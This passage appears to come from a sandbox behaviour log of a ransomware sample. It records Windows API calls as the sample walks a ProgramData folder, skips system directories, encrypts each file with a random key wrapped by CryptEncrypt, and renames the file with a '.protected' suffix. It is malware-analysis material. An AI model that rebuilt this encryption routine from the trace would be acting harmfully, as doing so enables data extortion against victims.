returned 1 [0072.512] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.512] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.512] CloseHandle (hObject=0xa4) returned 1 [0072.512] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.protected") returned 67 [0072.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.protected")) returned 1 [0072.513] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="Windows") returned -1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="Program Files") returned -1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.513] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.513] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".protected") returned 0x0 
[0072.513] lstrcmpW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.513] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.513] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.513] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.513] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.513] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0072.513] StrStrW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.513] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x17c, lpOverlapped=0x0) returned 1 [0072.514] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.514] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x17c, lpOverlapped=0x0) 
returned 1 [0072.515] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.515] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.515] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.515] CloseHandle (hObject=0xa4) returned 1 [0072.515] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.protected") returned 73 [0072.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.protected")) returned 1 [0072.516] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="Windows") returned -1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="Program Files") returned -1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.516] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.516] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft 
Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.516] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.516] lstrcmpW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.516] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.516] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.518] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.518] StrStrW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.518] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.518] StrStrW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.518] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 57 [0072.518] StrStrW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.518] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.519] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.519] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.519] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.519] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.519] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.519] CloseHandle (hObject=0xa4) returned 1 [0072.520] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.protected") returned 67 [0072.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.protected")) returned 1 [0072.520] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.520] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.520] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.520] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.520] lstrcmpW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.521] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.521] StrStrW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.521] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.521] StrStrW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.521] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0072.521] StrStrW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.521] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.522] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.522] WriteFile (in: 
hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.523] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.523] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.524] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.524] CloseHandle (hObject=0xa4) returned 1 [0072.524] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.protected") returned 71 [0072.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.protected")) returned 1 [0072.525] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="Windows") returned -1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="Program Files") returned -1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.525] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn", 
lpString2="System Volume Information") returned -1 [0072.525] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.525] lstrcmpW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.525] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.525] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.525] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0072.525] StrStrW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.526] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.526] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0072.526] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.527] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.527] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.527] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.527] CloseHandle (hObject=0xa4) returned 1 [0072.527] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.protected") returned 64 [0072.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.protected")) returned 1 [0072.528] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="Windows") returned -1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="Program Files") returned -1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="System 
Volume Information") returned -1 [0072.528] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.528] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.528] lstrcmpW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.528] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.532] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.532] StrStrW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.532] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.532] StrStrW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.532] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.532] StrStrW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.532] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.533] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.533] 
WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.533] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.533] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.533] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.533] CloseHandle (hObject=0xa4) returned 1 [0072.534] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.protected") returned 64 [0072.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn.protected")) returned 1 [0072.534] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", 
lpString2="System Volume Information") returned -1 [0072.535] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.535] lstrcmpW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.535] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.535] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.535] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.535] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.536] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
